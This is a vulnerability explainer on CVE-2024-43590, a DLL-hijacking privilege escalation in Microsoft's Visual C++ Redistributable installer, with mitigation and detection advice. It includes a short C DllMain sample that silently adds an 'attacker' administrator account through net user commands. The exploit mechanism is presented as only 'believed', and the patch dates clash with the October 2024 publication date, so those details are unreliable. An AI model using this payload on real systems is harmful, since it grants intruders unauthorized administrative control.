CVE CyberSecurity Database News

CVE-2024-43590 - Visual C++ Redistributable Installer Elevation of Privilege Vulnerability Explained

Poster -

---

What is CVE-2024-43590?

CVE-2024-43590 is a recently discovered security flaw in the Visual C++ Redistributable Installer from Microsoft. This vulnerability allows attackers to gain higher privileges on a machine—technically called “Elevation of Privilege” (EoP). In simple terms, it means someone could run code as an administrator, bypassing the limitations of a normal user account.

Let’s break it down simply: installers sometimes need elevated permissions (i.e., ‘Run as Administrator’) to complete their job. If the installer is not handling security properly, malicious actors might hijack the process to get system-level access.

Who Is Affected?

Anyone using the Microsoft Visual C++ Redistributable Installer on Windows is at risk, especially in enterprise environments where these packages are widely installed by developers and end-user applications.

Exploit Details: How the Vulnerability Works

The vulnerability is believed to relate to how the installer process handles file permissions and DLLs (Dynamic Link Libraries).

Here’s an outline of a typical attack

1. Untrusted File Path: The installer loads DLLs from writable locations (e.g., %TEMP% or C:\Windows\Temp).
2. DLL Hijacking: An attacker, with low privileges, drops a malicious DLL named after a legitimate requirement (such as mylibrary.dll) in the target path before installation.
3. Installer Launched as Admin: When the Visual C++ Redistributable Installer runs (often as Administrator), it loads the attacker’s DLL code with full SYSTEM or Admin rights.

This process is called DLL preloading or DLL sideloading.

Example: Pseudocode of a Simple Exploit

Imagine the installer loads example.dll from the current directory. Here’s a simplified demonstration:

// Malicious example.dll loaded by the installer
#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) {
    switch (fdwReason) {
        case DLL_PROCESS_ATTACH:
            // Malicious code executed with elevated privileges
            system("net user attacker Passwrd! /add");
            system("net localgroup administrators attacker /add");
            break;
    }
    return TRUE;
}

What this does:
If our example.dll is loaded by the installer as SYSTEM or Admin, it will quietly add a new administrator user.

Mitigation and Patch

Microsoft has released updates to address CVE-2024-43590 by ensuring the installer only loads trusted DLLs from secure locations. Users should:
- Install all system and software updates via Windows Update, especially any security updates from May or June 2024.

Limit user permissions where possible.

For sysadmins, block write access to system temp directories and monitor them for suspicious activity.

Detection

Check your event logs for suspicious account creation or unexpected processes running during Visual C++ Redistributable installation.

For live response, use tools like Sysinternals Process Monitor to identify unexpected DLL loading by the installer process.

References & Further Reading

- Microsoft Security Update Guide: CVE-2024-43590
- DLL Hijacking Explained (Wikipedia)
- Sysinternals Suite

Final Thoughts

CVE-2024-43590 is a reminder that even trusted software installers can introduce risk, especially when interacting with system resources. Make sure your systems are patched and always double-check where you launch installers from. Stay vigilant and keep your systems updated!

Timeline

Published on: 10/08/2024 18:15:26 UTC
Last modified on: 10/13/2024 01:02:46 UTC